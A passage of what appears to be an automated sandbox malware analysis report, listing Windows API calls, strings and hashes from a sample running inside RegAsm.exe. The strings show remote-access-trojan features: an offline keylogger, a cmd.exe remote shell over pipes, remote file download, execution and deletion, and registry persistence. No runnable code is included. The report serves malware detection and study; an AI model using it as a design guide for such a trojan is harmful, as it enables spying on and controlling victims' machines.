                                • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                • CloseHandle.KERNEL32(00000000), ref: 0041C477
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreatePointerWrite
                                • String ID: hpF
                                • API String ID: 1852769593-151379673
                                • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A

                                Control-flow Graph

                                control_flow_graph 1402 41b2c3-41b31a call 41bfb7 call 4135a6 call 401fe2 call 401fd8 call 406ae1 1413 41b35d-41b366 1402->1413 1414 41b31c-41b347 call 4135a6 call 401fab StrToIntA 1402->1414 1416 41b368-41b36d 1413->1416 1417 41b36f 1413->1417 1424 41b355-41b358 call 401fd8 1414->1424 1425 41b349-41b352 call 41cf69 1414->1425 1418 41b374-41b37f call 40537d 1416->1418 1417->1418 1424->1413 1425->1424
                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                  • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCurrentOpenProcessQueryValue
                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 1866151309-2070987746
                                • Opcode ID: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                • Opcode Fuzzy Hash: 8f8f5d60ce35d1a1c8195802feeff86a127f68f3eb7fb2a0a498f7b0ec669ebf
                                • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE

                                Control-flow Graph

                                control_flow_graph 1476 40a675-40a685 1477 40a722-40a725 1476->1477 1478 40a68b-40a68d 1476->1478 1479 40a690-40a6b6 call 401f04 CreateFileW 1478->1479 1482 40a6f6 1479->1482 1483 40a6b8-40a6c6 GetFileSize 1479->1483 1486 40a6f9-40a6fd 1482->1486 1484 40a6c8 1483->1484 1485 40a6ed-40a6f4 CloseHandle 1483->1485 1487 40a6d2-40a6d9 1484->1487 1488 40a6ca-40a6d0 1484->1488 1485->1486 1486->1479 1489 40a6ff-40a702 1486->1489 1490 40a6e2-40a6e7 Sleep 1487->1490 1491 40a6db-40a6dd call 40b0dc 1487->1491 1488->1485 1488->1487 1489->1477 1492 40a704-40a70b 1489->1492 1490->1485 1491->1490 1492->1477 1493 40a70d-40a71d call 40905c call 40a179 1492->1493 1493->1477
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                • CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSizeSleep
                                • String ID: XQG
                                • API String ID: 1958988193-3606453820
                                • Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                • Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CountEventTick
                                • String ID: !D@$NG
                                • API String ID: 180926312-2721294649
                                • Opcode ID: dd46a5856b9f4a2a66a2a9ff3bdaeba80821d296031fdaf545dfc14b5640e819
                                • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                • Opcode Fuzzy Hash: dd46a5856b9f4a2a66a2a9ff3bdaeba80821d296031fdaf545dfc14b5640e819
                                • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                                  • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                  • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTimewsprintf
                                • String ID: Offline Keylogger Started
                                • API String ID: 465354869-4114347211
                                • Opcode ID: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                                • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                • Opcode Fuzzy Hash: e8215c935415644a741e178cef246bea46bfec4a592ac60f75e4063261735619
                                • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                APIs
                                • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                Strings
                                • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$EventLocalThreadTime
                                • String ID: KeepAlive | Enabled | Timeout:
                                • API String ID: 2532271599-1507639952
                                • Opcode ID: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                                • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                • Opcode Fuzzy Hash: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
                                • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                • RegCloseKey.KERNEL32(?), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: pth_unenc
                                • API String ID: 1818849710-4028850238
                                • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                • CloseHandle.KERNEL32(?), ref: 00404DDB
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                • String ID:
                                • API String ID: 3360349984-0
                                • Opcode ID: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                • Opcode Fuzzy Hash: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                APIs
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad$ErrorLast
                                • String ID:
                                • API String ID: 3177248105-0
                                • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                APIs
                                • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateEventStartupsocket
                                • String ID: (I)
                                • API String ID: 1953588214-2853610090
                                • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                APIs
                                • getaddrinfo.WS2_32(00000000,00000000,00000000,(I),004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                                • WSASetLastError.WS2_32(00000000), ref: 00414F10
                                  • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                  • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                                  • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                  • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                  • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                                  • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                  • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                  • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                • String ID: (I)
                                • API String ID: 1170566393-2853610090
                                • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                                • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                                • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                • GetLastError.KERNEL32 ref: 0040D083
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateErrorLastMutex
                                • String ID: SG
                                • API String ID: 1925916568-3189917014
                                • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                • RegQueryValueExA.KERNEL32 ref: 004135E7
                                • RegCloseKey.KERNEL32(?), ref: 004135F2
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
                                • RegQueryValueExA.KERNEL32 ref: 0041372D
                                • RegCloseKey.KERNEL32(00000000), ref: 00413738
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                • RegQueryValueExA.KERNEL32 ref: 00413587
                                • RegCloseKey.KERNEL32(?), ref: 00413592
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                APIs
                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
                                • RegQueryValueExA.KERNEL32 ref: 0041352A
                                • RegCloseKey.KERNEL32(?), ref: 00413535
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                • RegCloseKey.ADVAPI32(004660A4), ref: 004138AB
                                • API ID: CloseCreateValue
                                • String ID:
                                • API String ID: 1818849710-0
                                APIs
                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
                                • API ID: Info
                                • String ID:
                                • API String ID: 1807457897-3916222277
                                APIs
                                • API ID: _wcslen
                                • String ID: pQG
                                • API String ID: 176396367-3769108836
                                APIs
                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24
                                • API ID: String
                                • String ID: LCMapStringEx
                                • API String ID: 2568140703-3893581201
                                APIs
                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF
                                Strings
                                • InitializeCriticalSectionEx, xrefs: 00448A9F
                                • API ID: CountCriticalInitializeSectionSpin
                                • String ID: InitializeCriticalSectionEx
                                • API String ID: 2593887523-3084827643
                                APIs
                                • API ID: Alloc
                                • String ID: FlsAlloc
                                • API String ID: 2773662609-671089009
                                APIs
                                • try_get_function.LIBVCRUNTIME ref: 00438DA9
                                • API ID: try_get_function
                                • String ID: FlsAlloc
                                • API String ID: 2742660187-671089009
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                                • API ID: GlobalMemoryStatus
                                • String ID: @
                                • API String ID: 1890195054-2766056989
                                APIs
                                  • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
                                • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
                                • API ID: CodeInfoPageValid
                                • String ID:
                                • API String ID: 546120528-0
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                  • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                                  • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                                  • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                • _free.LIBCMT ref: 0044EFD0
                                • _free.LIBCMT ref: 0044F006
                                • API ID: _free$ErrorLast_abort
                                • String ID:
                                • API String ID: 2991157371-0
                                APIs
                                • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                • API ID: AddressProc__crt_fast_encode_pointer
                                • String ID:
                                • API String ID: 2279764990-0
                                APIs
                                • API ID: Window$ForegroundText
                                • String ID:
                                • API String ID: 29597999-0
                                APIs
                                  • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                • String ID:
                                • API String ID: 806969131-0
                                APIs
                                • API ID: __alldvrm
                                • String ID:
                                • API String ID: 65215352-0
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                APIs
                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                • API ID: Startup
                                • String ID:
                                • API String ID: 724789610-0
                                APIs
                                • API ID: send
                                • String ID:
                                • API String ID: 2809346765-0
                                APIs
                                • API ID: recv
                                • String ID:
                                • API String ID: 1507349165-0
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                  • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                  • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                  • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                  • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                • DeleteFileA.KERNEL32(?), ref: 00408652
                                  • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                  • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                  • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                  • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                • Sleep.KERNEL32(000007D0), ref: 004086F8
                                • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                                  • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7
                                • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                • API String ID: 1067849700-181434739
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004056E6
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • __Init_thread_footer.LIBCMT ref: 00405723
                                • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                • CloseHandle.KERNEL32 ref: 00405A23
                                • CloseHandle.KERNEL32 ref: 00405A2B
                                • CloseHandle.KERNEL32 ref: 00405A3D
                                • CloseHandle.KERNEL32 ref: 00405A45
                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                • API String ID: 2994406822-18413064
                                • Opcode ID: 4cf14b19ad4f1a50ef4e69f7ada5f02e3acfdea048b49c70ac55160503c0ddf4
                                • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                • Opcode Fuzzy Hash: 4cf14b19ad4f1a50ef4e69f7ada5f02e3acfdea048b49c70ac55160503c0ddf4
                                • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                APIs
                                • GetCurrentProcessId.KERNEL32 ref: 00412106
                                  • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                  • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                  • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4), ref: 004138AB
                                • OpenMutexA.KERNEL32 ref: 00412146
                                • CloseHandle.KERNEL32(00000000), ref: 00412155
                                • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
